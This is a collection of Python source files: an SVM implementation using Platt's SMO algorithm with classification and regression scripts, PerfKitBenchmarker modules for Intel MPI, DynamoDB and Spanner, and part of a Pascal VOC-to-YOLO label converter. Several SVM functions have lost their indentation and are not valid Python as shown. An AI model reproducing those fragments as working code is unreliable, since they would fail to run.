Part 3: functions required by the SMO algorithm
"""
# alpha的值到L和H之间.
def clip(alpha, L, H):
if alpha < L:
return L
elif alpha > H:
return H
else:
return alpha
# 随机选择一个和当前因子不同的因子
def select_j_rand(i, m):
    ''' Randomly pick an index from range(m), excluding i.
    '''
l = list(range(m))
seq = l[: i] + l[i + 1:]
return np.random.choice(seq)
# 启发式选择第二个因子
def select_j(i, svm):
errors = svm.errors
valid_indices = [i for i, a in enumerate(svm.alphas) if 0 < a < svm.C]
if len(valid_indices) > 1:
j = -1
max_delta = 0
for k in valid_indices:
if k == i:
continue
            # compare against candidate k (using errors[j] here was a bug: j has not been chosen yet)
            delta = abs(errors[i] - errors[k])
if delta > max_delta:
j = k
max_delta = delta
else:
j = select_j_rand(i, len(svm.feature))
return j
# 优化已经选择的一对因子
def take_step(i, j, svm):
# 首先获得最新的误差列表
svm.update_errors()
# 拉格朗日因子及其对应的样本数据,标签数据,误差
a_i, x_i, y_i, e_i = svm.alphas[i], svm.feature[i], svm.labels[i], svm.errors[i]
a_j, x_j, y_j, e_j = svm.alphas[j], svm.feature[j], svm.labels[j], svm.errors[j]
# 计算单样本之间的核函数
k_ii, k_jj, k_ij = svm.kernel(x_i, x_i), svm.kernel(x_j, x_j), svm.kernel(x_i, x_j)
eta = k_ii + k_jj - 2 * k_ij
if eta <= 0:
return 0
a_i_old, a_j_old = a_i, a_j
a_j_new = a_j_old + y_j * (e_i - e_j) / eta
# 对alpha进行修剪
if y_i != y_j:
Lmax = max(0, a_j_old - a_i_old)
Hmin = min(svm.C, svm.C + a_j_old - a_i_old)
else:
Lmax = max(0, a_i_old + a_j_old - svm.C)
Hmin = min(svm.C, a_j_old + a_i_old)
a_j_new = clip(a_j_new, Lmax, Hmin)
a_i_new = a_i_old + y_i * y_j * (a_j_old - a_j_new)
if abs(a_j_new - a_j_old) < svm.eps:
return 0
# 更新拉格朗日因子
svm.alphas[i], svm.alphas[j] = a_i_new, a_j_new
# 更新误差
svm.update_errors()
# 更新阈值b
b_i = -e_i - y_i * k_ii * (a_i_new - a_i_old) - y_j * k_ij * (a_j_new - a_j_old) + svm.b
b_j = -e_j - y_i * k_ij * (a_i_new - a_i_old) - y_j * k_jj * (a_j_new - a_j_old) + svm.b
if 0 < a_i_new < svm.C:
bnum = b_i
elif 0 < a_j_new < svm.C:
bnum = b_j
else:
bnum = (b_i + b_j) / 2
# 更新b值
svm.b = bnum
return 1
# Given the first alpha, check whether it violates the KKT conditions and,
# if so, pick a second alpha and optimize the pair.
def examine_example(i, svm):
    e_i, y_i, alpha = svm.errors[i], svm.labels[i], svm.alphas[i]
    r = e_i * y_i
    # Does this sample violate the KKT conditions?
    if (r < -svm.toler and alpha < svm.C) or (r > svm.toler and alpha > 0):
        # Heuristic selection of the second multiplier
        j = select_j(i, svm)
        return take_step(i, j, svm)
    else:
        return 0
# Implementation of Platt's SMO algorithm
def platt_smo(svm):
    # Outer-loop iteration counter
    it = 0
    # Flag: iterate over all samples (True) or only the non-bound ones (False)
    entire = True
    pair_changed = 0
    while it < svm.times and (pair_changed > 0 or entire):
        pair_changed = 0
        if entire:
            for i in range(len(svm.feature)):
                pair_changed += examine_example(i, svm)
            print('Full pass - multiplier pairs changed: %s' % pair_changed)
        else:
            alphas = svm.alphas
            non_bound_indices = [i for i in range(len(svm.feature)) if alphas[i] > 0 and alphas[i] < svm.C]
            for i in non_bound_indices:
                pair_changed += examine_example(i, svm)
            print('Non-bound pass - multipliers changed: %s' % pair_changed)
        # Count the iteration
        it += 1
        # Switch between full and non-bound passes
        if entire:
            entire = False
        elif pair_changed == 0:
            entire = True
    print('Number of outer-loop iterations: %s' % it)
    return svm.alphas, svm.b
# Prediction function
def predict(svm, prefeature):
    prlt = np.array((np.array([svm.alphas]).reshape(-1, 1) * svm.kernel(prefeature, svm.feature) * np.array([svm.labels]).reshape(-1, 1)).sum(axis=0) + svm.b)
    signre = np.sign(prlt[0])
    return signre
# Accuracy function
def getacc(svm, prefeature, prelabel):
    predu = predict(svm, prefeature)
    # Compute the accuracy
    sub = np.array(predu - prelabel)
    print(sub)
    acc = len(sub[sub == 0]) / len(prelabel)
    print(acc)
    return acc
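# Minimal usage sketch (assumes X_train/y_train/X_test/y_test are numpy arrays
# with labels in {-1, +1}, and that the KERNEL class is defined as above):
#
#     model = SVM(feature=X_train, labels=y_train, kernel='rbf')
#     platt_smo(model)                     # fit the multipliers and threshold b
#     y_pred = predict(model, X_test)      # returns the sign of the decision value
#     getacc(model, X_test, y_test)        # fraction of exactly matching labels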
# Import the heart-disease dataset
import SVM_Classify_Data as sdata
# datadict: dictionary of K-fold datasets
def result(datadict, he):
    sign = []
    trainacc, testacc, vec = [], [], []
    resu = []
    for jj in datadict:
        # Training data
        xd = datadict[jj][0][:, :-1]
        yd = datadict[jj][0][:, -1]
        # Test data
        texd = datadict[jj][1][:, :-1]
        teyd = datadict[jj][1][:, -1]
        # Build the model
        resu = SVM(feature=xd, labels=yd, kernel=he)
        # Train it
        platt_smo(resu)
        # Store the training and test accuracies
        traaa = getacc(resu, xd, yd)
        teaaa = getacc(resu, texd, teyd)
        trainacc.append(traaa)
        testacc.append(teaaa)
        # Number of support vectors (alphas > 0); len(resu.alphas > 0) counted all samples
        count = int(np.sum(resu.alphas > 0))
        vec.append(count)
        sign.append(jj)
        print(traaa, teaaa, count)
    # Plot a figure with two y axes
    fig, host = plt.subplots()
    # Second y axis
    par1 = host.twinx()
    # Curves
    p1, = host.plot(sign, trainacc, "b-", marker='8', label='Train', linewidth=2)
    pp, = host.plot(sign, testacc, "b--", marker='*', label='Test', linewidth=2)
    p2, = par1.plot(sign, vec, "r-", marker='8', label='Support vectors', linewidth=2)
    # Axis labels
    host.set_xlabel("K-fold dataset")
    host.set_ylabel("Classification accuracy")
    par1.set_ylabel("Count")
    # Color of each y-axis label
    host.yaxis.label.set_color(p1.get_color())
    par1.yaxis.label.set_color(p2.get_color())
    # Color of the tick labels and width of the tick lines on each y axis
    tkw = dict(size=6, width=3)
    host.tick_params(axis='y', colors=p1.get_color(), **tkw)
    par1.tick_params(axis='y', colors=p2.get_color(), **tkw)
    # Legend
    lines = [p1, pp, p2]
    host.legend(lines, [l.get_label() for l in lines], loc='lower center')
    # Title
    plt.title('SVM classification results on the K-fold heart-disease dataset (kernel: %s)' % he)
    # Color of each y-axis spine
    ax = plt.gca()
    ax.spines['left'].set_color('blue')
    ax.spines['right'].set_color('red')
    # Show the figure
    plt.show()
'''Part 4: main program'''
if __name__ == "__main__":
    # The choice of kernel matters a great deal
    result(sdata.kfold_train_datadict, 'rbf')
```
#### File: SVM/SVM_Classify/Sklearn_Classify_SVM.py
```python
"""
第一部分:引入库
"""
# 引入心脏病数据
import SVM_Classify_Data as sdata
# 引入库包
from sklearn import svm
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
"""
第二部分:构建函数
"""
# 核函数
def sk_svm_train(intr, labeltr, inte, labelte, kener):
clf = svm.SVC(kernel=kener)
# 开始训练
clf.fit(intr, labeltr)
# 绘图的标识
figsign = kener
# 训练精确度
acc_train = clf.score(intr, labeltr)
# 测试精确度
acc_test = clf.score(inte, labelte)
# 支持向量的个数
vec_count = sum(clf.n_support_)
# 支持向量
vectors = clf.support_vectors_
return acc_train, acc_test, vec_count, vectors, figsign
# 结果输出函数
'''
‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’
'''
# datadict: dictionary of K-fold datasets
def result(datadict, he='rbf'):
    sign = []
    trainacc, testacc, vec = [], [], []
    resu = []
    for jj in datadict:
        # Training data
        xd = datadict[jj][0][:, :-1]
        yd = datadict[jj][0][:, -1]
        # Test data
        texd = datadict[jj][1][:, :-1]
        teyd = datadict[jj][1][:, -1]
        # Train
        resu = sk_svm_train(xd, yd, texd, teyd, he)
        # Store the results
        trainacc.append(resu[0])
        testacc.append(resu[1])
        vec.append(resu[2])
        sign.append(jj)
    # Plot a figure with two y axes
    fig, host = plt.subplots()
    # Second y axis
    par1 = host.twinx()
    # Curves
    p1, = host.plot(sign, trainacc, "b-", marker='8', label='Train', linewidth=2)
    pp, = host.plot(sign, testacc, "b--", marker='*', label='Test', linewidth=2)
    p2, = par1.plot(sign, vec, "r-", marker='8', label='Support vectors', linewidth=2)
    # Axis labels
    host.set_xlabel("K-fold dataset")
    host.set_ylabel("Classification accuracy")
    par1.set_ylabel("Count")
    # Color of each y-axis label
    host.yaxis.label.set_color(p1.get_color())
    par1.yaxis.label.set_color(p2.get_color())
    # Color of the tick labels and width of the tick lines on each y axis
    tkw = dict(size=6, width=3)
    host.tick_params(axis='y', colors=p1.get_color(), **tkw)
    par1.tick_params(axis='y', colors=p2.get_color(), **tkw)
    # Legend
    lines = [p1, pp, p2]
    host.legend(lines, [l.get_label() for l in lines], loc='lower center')
    # Title
    plt.title('SVM classification results on the K-fold heart-disease dataset (kernel: %s)' % resu[-1])
    # Color of each y-axis spine
    ax = plt.gca()
    ax.spines['left'].set_color('blue')
    ax.spines['right'].set_color('red')
    # Show the figure
    plt.show()
'''Part 4: main program'''
if __name__ == "__main__":
    result(sdata.kfold_train_datadict, he='rbf')
```
#### File: SVM/SVM_Regression/Sklearn_SVM_Regression.py
```python
"""
第一部分:引入库
"""
# 引入部分的北京PM2.5数据
import SVM_Regression_Data as rdata
# 引入库包
from sklearn import svm
import numpy as np
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
"""
第二部分:构建函数
"""
# 核函数
def sk_svm_train(intr, labeltr, inte, kener):
clf = svm.SVR(kernel=kener)
# 开始训练
clf.fit(intr, labeltr)
# 训练输出
tr = clf.predict(intr)
# 预测输出
pr = clf.predict(inte)
return tr, pr
# 结果输出函数
'''
‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’
'''
# data: dataset produced by SVM_Regression_Data
def result(data, he='rbf'):
    # Model outputs for training and prediction
    trainacc, testacc = [], []
    xd = data[0]
    yd = data[1].T[0]
    # Test data
    texd = data[2]
    teyd = data[3].T[0]
    # Train
    resu = sk_svm_train(xd, yd, texd, he)
    # Undo the [0, 1] scaling of the target (data[4] holds [ymin, ymax])
    tra = resu[0] * (data[4][1] - data[4][0]) + data[4][0]
    pre = resu[1] * (data[4][1] - data[4][0]) + data[4][0]
    ydd = data[1].T[0] * (data[4][1] - data[4][0]) + data[4][0]
    teyd = data[3].T[0] * (data[4][1] - data[4][0]) + data[4][0]
    return ydd, tra, teyd, pre
# Plotting function
def huitu(suout, shiout, c=['b', 'k'], sign='Train', cudu=3):
    # Compare the actual values with the model output
    plt.subplot(2, 1, 1)
    plt.plot(list(range(len(suout))), suout, c=c[0], linewidth=cudu, label='%s: model output' % sign)
    plt.plot(list(range(len(shiout))), shiout, c=c[1], linewidth=cudu, label='%s: actual value' % sign)
    plt.legend(loc='best')
    plt.title('Actual data vs. SVR output')
    # Plot the error against zero
    plt.subplot(2, 2, 3)
    plt.plot(list(range(len(suout))), suout - shiout, c='r', linewidth=cudu, label='%s: error' % sign)
    plt.plot(list(range(len(suout))), list(np.zeros(len(suout))), c='k', linewidth=cudu, label='zero')
    plt.legend(loc='best')
    plt.title('Error vs. zero')
    # Histogram of the errors
    plt.subplot(2, 2, 4)
    plt.hist(suout - shiout, 50, facecolor='g', alpha=0.75)
    plt.title('Error histogram')
    # Show the figure
    plt.show()
'''Part 4: main program'''
if __name__ == "__main__":
    datasvr = rdata.model_data
    realtr, outtri, realpre, poupre = result(datasvr, he='rbf')
    huitu(realtr, outtri, c=['b', 'k'], sign='Train', cudu=1.5)
    huitu(realpre, poupre, c=['b', 'k'], sign='Prediction', cudu=1.5)
```
#### File: SVM/SVM_Regression/SVM_Regression_Data.py
```python
import pandas as pd
import numpy as np
data = pd.read_csv(r'C:\Users\GWT9\Desktop\PRSA_data_2010.1.1-2014.12.31.csv')
# Data preprocessing
# The target field is pm2.5, so drop the rows where this column is NaN
data_nan = data[np.isfinite(data['pm2.5'])]
# The first column is just a row index and is not needed
data_one = data_nan[data_nan.columns[1:]]
# One-hot encode the 'cbwd' column
one_data = pd.get_dummies(data_one['cbwd'], prefix='cbwd')
# Drop the original 'cbwd' column
data_cw = data_one.drop(['cbwd'], axis=1)
# Append the one-hot encoded columns
data_hh = pd.concat([data_cw, one_data], axis=1)
# Because of the data volume, only a random subset is used for training
def serand(dafra, precent=0.01):
    df2 = dafra.sample(frac=precent)
    return df2
data_hh = serand(data_hh)
# Maximum and minimum of the target values (used later to undo the scaling)
ymax = np.max(data_hh['pm2.5'].values, keepdims=True)
ymin = np.min(data_hh['pm2.5'].values, keepdims=True)
# Standardize all feature columns and scale the target to [0, 1]
def norm(dat):
    da = pd.DataFrame()
    for hh in dat.columns:
        if hh != 'pm2.5':
            da[hh] = (dat[hh] - np.mean(dat[hh])) / np.std(dat[hh])  # standardization
            # da[hh] = (dat[hh] - np.min(dat[hh])) / (np.max(dat[hh]) - np.min(dat[hh]))  # min-max scaling
        else:
            da[hh] = (dat[hh] - np.min(dat[hh])) / (np.max(dat[hh]) - np.min(dat[hh]))  # min-max scaling
    return da
datee = norm(data_hh)
# Separate the target data from the feature data
Ydata = np.array(datee['pm2.5'].values).reshape(-1, 1)  # target data
Xdata = datee.drop(['pm2.5'], axis=1).values  # feature data
# Split the data into a training set and a prediction (test) set
def divided(xdata, ydata, percent=0.3):
    sign_list = list(range(len(xdata)))
    # Indices used for testing
    select_sign = np.random.choice(sign_list, int(len(xdata) * percent), replace=False)
    # Indices used for training
    no_select_sign = [isign for isign in sign_list if isign not in select_sign]
    # Test data
    x_predict_data = xdata[select_sign]
    y_predict_data = np.array(ydata[select_sign]).reshape(-1, len(ydata[0]))  # reshape
    # Training data
    x_train_data = xdata[no_select_sign]
    y_train_data = np.array(ydata[no_select_sign]).reshape(-1, len(ydata[0]))  # reshape
    return x_train_data, y_train_data, x_predict_data, y_predict_data  # training x, y; test x, y
# Data ready for the model; result() expects the [ymin, ymax] order when
# undoing the [0, 1] scaling (the original appended [ymax, ymin], which
# inverted the rescaled values)
model_data = list(divided(Xdata, Ydata))
model_data.append([ymin, ymax])
``` |
{
"source": "jojoya/PerfKitBenchmarker",
"score": 2
} |
#### File: perfkitbenchmarker/linux_packages/intelmpi.py
```python
import logging
from absl import flags
from perfkitbenchmarker.linux_packages import intel_repo
MPI_VERSION = flags.DEFINE_string('intelmpi_version', '2019.6-088',
'MPI version.')
FLAGS = flags.FLAGS
def MpiVars(vm) -> str:
"""Returns the path to the mpivars.sh file.
With different versions of Intel software installed the mpivars.sh for
2019.6 can be under compilers_and_libraries_2020.0.166 while the symlink
for compilers_and_libraries points to compilers_and_libraries_2018
Args:
vm: Virtual machine to look for mpivars.sh on.
"""
txt, _ = vm.RemoteCommand('readlink -f /opt/intel/compilers_and_libraries*/'
'linux/mpi/intel64/bin/mpivars.sh | sort | uniq')
files = txt.splitlines()
if not files:
raise ValueError('Could not find the mpivars.sh file')
if len(files) > 1:
logging.info('More than 1 mpivars.sh found, returning first: %s', files)
return files[0]
def FixEnvironment(vm):
"""Changes system settings for optimal Intel MPI conditions.
Sets the ptrace_scope to 0, for details see:
https://www.kernel.org/doc/Documentation/security/Yama.txt
Args:
vm: The virtual machine to run on.
"""
if not vm.TryRemoteCommand('ulimit -l | grep unlimited'):
ulimit_fix_cmd = (f'echo "{vm.user_name} - memlock unlimited" | '
'sudo tee -a /etc/security/limits.conf')
vm.RemoteCommand(ulimit_fix_cmd)
    logging.info('Rebooting to permanently set ulimit')
vm.Reboot()
vm.WaitForBootCompletion()
vm.RemoteCommand('sudo sysctl -w kernel.yama.ptrace_scope=0')
def _Install(vm, mpi_version: str) -> None:
"""Installs Intel MPI."""
vm.InstallPackages(f'intel-mpi-{mpi_version}')
FixEnvironment(vm)
# Log the version of MPI and other associated values for debugging
vm.RemoteCommand(f'. {MpiVars(vm)}; mpirun -V')
def AptInstall(vm) -> None:
"""Installs the MPI library."""
intel_repo.AptPrepare(vm)
_Install(vm, MPI_VERSION.value)
# Ubuntu's POSIX dash shell does not have bash's "==" comparator
vm.RemoteCommand(f'sudo sed -i "s/==/=/" {MpiVars(vm)}')
def YumInstall(vm) -> None:
"""Installs the MPI library."""
intel_repo.YumPrepare(vm)
_Install(vm, MPI_VERSION.value)
```
#### File: providers/aws/aws_dynamodb.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
from absl import flags
from perfkitbenchmarker import non_relational_db
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import util
from six.moves import range
FLAGS = flags.FLAGS
flags.DEFINE_string('aws_dynamodb_primarykey',
'primary_key',
'The primaryKey of dynamodb table.'
'This switches to sortkey if using sort.'
'If testing GSI/LSI, use the range keyname'
'of the index you want to test')
flags.DEFINE_boolean('aws_dynamodb_use_sort',
False,
'determine whether to use sort key or not')
flags.DEFINE_string('aws_dynamodb_sortkey',
'sort_key',
'The sortkey of dynamodb table. '
'This switches to primarykey if using sort.'
'If testing GSI/LSI, use the primary keyname'
'of the index you want to test')
flags.DEFINE_enum('aws_dynamodb_attributetype',
'S', ['S', 'N', 'B'],
'The type of attribute, default to S (String).'
'Alternates are N (Number) and B (Binary).')
flags.DEFINE_integer('aws_dynamodb_read_capacity',
'5',
'Set RCU for dynamodb table')
flags.DEFINE_integer('aws_dynamodb_write_capacity',
'5',
'Set WCU for dynamodb table')
flags.DEFINE_integer('aws_dynamodb_lsi_count',
0, 'Set amount of Local Secondary Indexes. Only set 0-5')
flags.register_validator('aws_dynamodb_lsi_count',
lambda value: -1 < value < 6,
message='--count must be from 0-5')
flags.register_validator('aws_dynamodb_use_sort',
lambda sort: sort or not FLAGS.aws_dynamodb_lsi_count,
message='--aws_dynamodb_lsi_count requires sort key.')
flags.DEFINE_integer('aws_dynamodb_gsi_count',
0, 'Set amount of Global Secondary Indexes. Only set 0-5')
flags.register_validator('aws_dynamodb_gsi_count',
lambda value: -1 < value < 6,
message='--count must be from 0-5')
flags.DEFINE_boolean('aws_dynamodb_ycsb_consistentReads',
False,
"Consistent reads cost 2x eventual reads. "
"'false' is default which is eventual")
flags.DEFINE_integer('aws_dynamodb_connectMax', 50,
'Maximum number of concurrent dynamodb connections. '
'Defaults to 50.')
class _GetIndexes():
"""Used to create secondary indexes."""
def __init__(self):
self.lsi_count = FLAGS.aws_dynamodb_lsi_count
self.gsi_count = FLAGS.aws_dynamodb_gsi_count
def CreateLocalSecondaryIndex(self):
"""Used to create local secondary indexes."""
lsi_items = []
lsi_entry = []
attr_list = []
for lsi in range(0, self.lsi_count):
lsi_item = ('{{"IndexName": "lsiidx{0}",'
'"KeySchema": [{{'
'"AttributeName": "{1}",'
'"KeyType": "HASH"}},{{'
'"AttributeName": "lattr{2}",'
'"KeyType": "RANGE"}}],'
'"Projection": {{'
'"ProjectionType": "KEYS_ONLY"}}}}'.format(
str(lsi),
FLAGS.aws_dynamodb_primarykey,
str(lsi)))
lsi_entry.append(lsi_item)
attr_list.append('{{"AttributeName": "lattr{0}","AttributeType": "{1}"}}'
.format(str(lsi), FLAGS.aws_dynamodb_attributetype))
lsi_items.append('[' + ','.join(lsi_entry) + ']')
lsi_items.append(','.join(attr_list))
return lsi_items
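    # Illustrative example (not from the original source): with
    # --aws_dynamodb_lsi_count=1 and the default flags, lsi_items[0] holds the
    # JSON list passed to --local-secondary-indexes, roughly:
    #   [{"IndexName": "lsiidx0",
    #     "KeySchema": [{"AttributeName": "primary_key", "KeyType": "HASH"},
    #                   {"AttributeName": "lattr0", "KeyType": "RANGE"}],
    #     "Projection": {"ProjectionType": "KEYS_ONLY"}}]
    # and lsi_items[1] holds the extra attribute definition for lattr0.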
def CreateGlobalSecondaryIndex(self):
"""Used to create global secondary indexes."""
gsi_items = []
gsi_entry = []
attr_list = []
for gsi in range(0, self.gsi_count):
gsi_item = ('{{"IndexName": "gsiidx{0}",'
'"KeySchema": [{{'
'"AttributeName": "gsikey{1}",'
'"KeyType": "HASH"}},{{'
'"AttributeName": "gattr{2}",'
'"KeyType": "RANGE"}}],'
'"Projection": {{'
'"ProjectionType": "KEYS_ONLY"}},'
'"ProvisionedThroughput": {{'
'"ReadCapacityUnits": {3},'
'"WriteCapacityUnits": {4}}}}}'.format(str(gsi),
str(gsi),
str(gsi),
5, 5))
gsi_entry.append(gsi_item)
attr_list.append('{{"AttributeName": "gattr{0}","AttributeType": "{1}"}}'
.format(str(gsi), FLAGS.aws_dynamodb_attributetype))
attr_list.append('{{"AttributeName": "gsikey{0}","AttributeType": "{1}"}}'
.format(str(gsi), FLAGS.aws_dynamodb_attributetype))
gsi_items.append('[' + ','.join(gsi_entry) + ']')
gsi_items.append(','.join(attr_list))
return gsi_items
class AwsDynamoDBInstance(non_relational_db.BaseNonRelationalDb):
"""Class for working with DynamoDB."""
SERVICE_TYPE = non_relational_db.DYNAMODB
def __init__(self, table_name, **kwargs):
super(AwsDynamoDBInstance, self).__init__(**kwargs)
self.zone = FLAGS.zones[0] if FLAGS.zones else FLAGS.zone[0]
self.region = util.GetRegionFromZone(self.zone)
self.primary_key = ('{{\"AttributeName\": \"{0}\",\"KeyType\": \"HASH\"}}'
.format(FLAGS.aws_dynamodb_primarykey))
self.sort_key = ('{{\"AttributeName\": \"{0}\",\"KeyType\": \"RANGE\"}}'
.format(FLAGS.aws_dynamodb_sortkey))
self.part_attributes = ('{{\"AttributeName\": \"{0}\",'
'\"AttributeType\": \"{1}\"}}'
.format(FLAGS.aws_dynamodb_primarykey,
FLAGS.aws_dynamodb_attributetype))
self.sort_attributes = ('{{\"AttributeName\": \"{0}\",'
'\"AttributeType\": \"{1}\"}}'
.format(FLAGS.aws_dynamodb_sortkey,
FLAGS.aws_dynamodb_attributetype))
self.table_name = table_name
self.throughput = 'ReadCapacityUnits={read},WriteCapacityUnits={write}'.format(
read=FLAGS.aws_dynamodb_read_capacity,
write=FLAGS.aws_dynamodb_write_capacity)
self.lsi_indexes = _GetIndexes().CreateLocalSecondaryIndex()
self.gsi_indexes = _GetIndexes().CreateGlobalSecondaryIndex()
def _Create(self):
"""Creates the dynamodb table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'create-table',
'--region', self.region,
'--table-name', self.table_name,
'--attribute-definitions', self.part_attributes,
'--key-schema', self.primary_key,
'--provisioned-throughput', self.throughput,
'--tags'] + util.MakeFormattedDefaultTags()
if FLAGS.aws_dynamodb_lsi_count > 0 and FLAGS.aws_dynamodb_use_sort:
cmd[10] = (
'[' + self.part_attributes + ', ' + self.sort_attributes + ', ' +
self.lsi_indexes[1] + ']')
logging.info('adding to --attribute definitions')
cmd.append('--local-secondary-indexes')
cmd.append(self.lsi_indexes[0])
cmd[12] = ('[' + self.primary_key + ', ' + self.sort_key + ']')
logging.info('adding to --key-schema')
elif FLAGS.aws_dynamodb_use_sort:
cmd[10] = ('[' + self.part_attributes + ', ' + self.sort_attributes + ']')
logging.info('adding to --attribute definitions')
cmd[12] = ('[' + self.primary_key + ', ' + self.sort_key + ']')
logging.info('adding to --key-schema')
if FLAGS.aws_dynamodb_gsi_count > 0:
cmd[10] = cmd[10][:-1]
cmd[10] += (', ' + self.gsi_indexes[1] + ']')
logging.info('adding to --attribute definitions')
cmd.append('--global-secondary-indexes')
cmd.append(self.gsi_indexes[0])
_, stderror, retcode = vm_util.IssueCommand(cmd, raise_on_failure=False)
if retcode != 0:
logging.warning('Failed to create table! %s', stderror)
def _Delete(self):
"""Deletes the dynamodb table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'delete-table',
'--region', self.region,
'--table-name', self.table_name]
logging.info('Attempting deletion: ')
vm_util.IssueCommand(cmd, raise_on_failure=False)
def _IsReady(self):
"""Check if dynamodb table is ready."""
logging.info('Getting table ready status for %s', self.table_name)
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--region', self.region,
'--table-name', self.table_name]
stdout, _, _ = vm_util.IssueCommand(cmd)
result = json.loads(stdout)
return result['Table']['TableStatus'] == 'ACTIVE'
def _Exists(self):
"""Returns true if the dynamodb table exists."""
logging.info('Checking if table %s exists', self.table_name)
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--region', self.region,
'--table-name', self.table_name]
_, _, retcode = vm_util.IssueCommand(cmd, raise_on_failure=False)
if retcode != 0:
return False
else:
return True
def _DescribeTable(self):
"""Calls describe on dynamodb table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--region', self.region,
'--table-name', self.table_name]
stdout, stderr, retcode = vm_util.IssueCommand(cmd, raise_on_failure=False)
if retcode != 0:
logging.info('Could not find table %s, %s', self.table_name, stderr)
return {}
    table_info = json.loads(stdout)['Table']
    if table_info.get('TableName') == self.table_name:
      return table_info
    return {}
def GetEndPoint(self):
ddbep = 'http://dynamodb.{0}.amazonaws.com'.format(self.region)
return ddbep
def GetResourceMetadata(self):
"""Returns a dict containing metadata about the dynamodb instance.
Returns:
dict mapping string property key to value.
"""
return {
'aws_dynamodb_primarykey': FLAGS.aws_dynamodb_primarykey,
'aws_dynamodb_use_sort': FLAGS.aws_dynamodb_use_sort,
'aws_dynamodb_sortkey': FLAGS.aws_dynamodb_sortkey,
'aws_dynamodb_attributetype': FLAGS.aws_dynamodb_attributetype,
'aws_dynamodb_read_capacity': FLAGS.aws_dynamodb_read_capacity,
'aws_dynamodb_write_capacity': FLAGS.aws_dynamodb_write_capacity,
'aws_dynamodb_lsi_count': FLAGS.aws_dynamodb_lsi_count,
'aws_dynamodb_gsi_count': FLAGS.aws_dynamodb_gsi_count,
'aws_dynamodb_consistentReads': FLAGS.aws_dynamodb_ycsb_consistentReads,
'aws_dynamodb_connectMax': FLAGS.aws_dynamodb_connectMax,
}
def AddTagsToExistingInstance(table_name, region):
"""Add tags to an existing DynamoDB table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--table-name', table_name,
'--region', region
]
stdout, _, _ = vm_util.IssueCommand(cmd)
resource_arn = json.loads(stdout)['Table']['TableArn']
cmd = util.AWS_PREFIX + [
'dynamodb', 'tag-resource', '--resource-arn', resource_arn, '--region',
region, '--tags'
] + util.MakeFormattedDefaultTags()
vm_util.IssueCommand(cmd)
```
#### File: providers/gcp/gcp_spanner_test.py
```python
import unittest
from absl import flags
from absl.testing import flagsaver
from perfkitbenchmarker.providers.gcp import gcp_spanner
from tests import pkb_common_test_case
FLAGS = flags.FLAGS
class SpannerTest(pkb_common_test_case.PkbCommonTestCase):
def setUp(self):
super().setUp()
pass
@flagsaver.flagsaver
def testInitFromSpec(self):
FLAGS.zone = ['us-east1-a']
spec_args = {
'service_type': gcp_spanner.DEFAULT_SPANNER_TYPE,
'name': 'test_instance',
'description': 'test_description',
'database': 'test_database',
'ddl': 'test_schema',
'nodes': 2,
'project': 'test_project',
}
test_spec = gcp_spanner.SpannerSpec('test_component', None, **spec_args)
spanner = gcp_spanner.GcpSpannerInstance.FromSpec(test_spec)
self.assertEqual(spanner.name, 'test_instance')
self.assertEqual(spanner._description, 'test_description')
self.assertEqual(spanner.database, 'test_database')
self.assertEqual(spanner._ddl, 'test_schema')
self.assertEqual(spanner._nodes, 2)
self.assertEqual(spanner.project, 'test_project')
self.assertEqual(spanner._config, 'regional-us-east1')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jo-jstrm/Damaged-Package-Detection",
"score": 3
} |
#### File: aisscv/utils/pascal_voc_to_yolo.py
```python
import argparse
import glob
import os
import xml.etree.ElementTree as ET
from os.path import join
from tqdm import tqdm
def parse_args():
parser = argparse.ArgumentParser(
description="Sample Pascal VOC XML-to-YOLO converter")
parser.add_argument("-x",
"--xml_dir",
help="Path to the folder where the input .xml files are stored.",
type=str, default=None)
parser.add_argument("-o",
"--output_path",
help="Path of output (all yolo-training-related data).", type=str)
parser.add_argument("--relative_img_path",
help="Path to prepend to the train.txt files. This path must determines where "
"the training images will reside. Set train_txt_path to path/to/train.txt "
"you want to change.",
type=str, default="data/aisscv")
parser.add_argument("--train_txt_path",
help="Path to the train.txt file that you want to change. Only necessary if you want to modify this file with --relative_img_path.",
type=str, default=None)
parser.add_argument("--negative_image_dir",
help="If non-empty, adds empty .txt files for the images in the given path.",
type=str, default=None)
args = parser.parse_args()
return args
def change_train_txt_paths(train_txt_path: str, path_to_add: str) -> None:
"""Changes the path that is prepended to the image files in the train.txt file.
This path must be the path where the files for YOLO training will reside."""
dir = os.path.split(train_txt_path)[0]
tmp_file = os.path.join(dir, 'train_tmp.txt')
with open(train_txt_path) as f_in, open(tmp_file, 'a') as f_out:
for line in f_in:
line = os.path.split(line)[-1]
out_line = os.path.join(path_to_add, line)
f_out.write(out_line)
os.remove(train_txt_path)
os.rename(tmp_file, train_txt_path)
def create_obj_names(classes: list, out_dir: str) -> None:
"""Creates the obj.names file required for training."""
file = join(out_dir, 'aisscv.names')
if os.path.exists(file):
os.remove(file)
with open(file, 'a') as obj_names:
for name in classes:
obj_names.write(name + '\n')
def convert(size: tuple, box: tuple) -> tuple:
"""From https://github.com/AlexeyAB/darknet"""
dw = 1./size[0]
dh = 1./size[1]
x = (box[0] + box[1])/2.0
y = (box[2] + box[3])/2.0
w = box[1] - box[0]
h = box[3] - box[2]
x = x*dw
w = w*dw
y = y*dh
h = h*dh
return (x, y, w, h)
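# Worked example (illustrative, not part of the original script): for a
# 640x480 image and a VOC box xmin=100, xmax=300, ymin=120, ymax=360,
# convert((640, 480), (100, 300, 120, 360)) returns
# (x, y, w, h) = (0.3125, 0.5, 0.3125, 0.5), i.e. the box centre and size
# normalised by the image dimensions, which is the YOLO label format.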
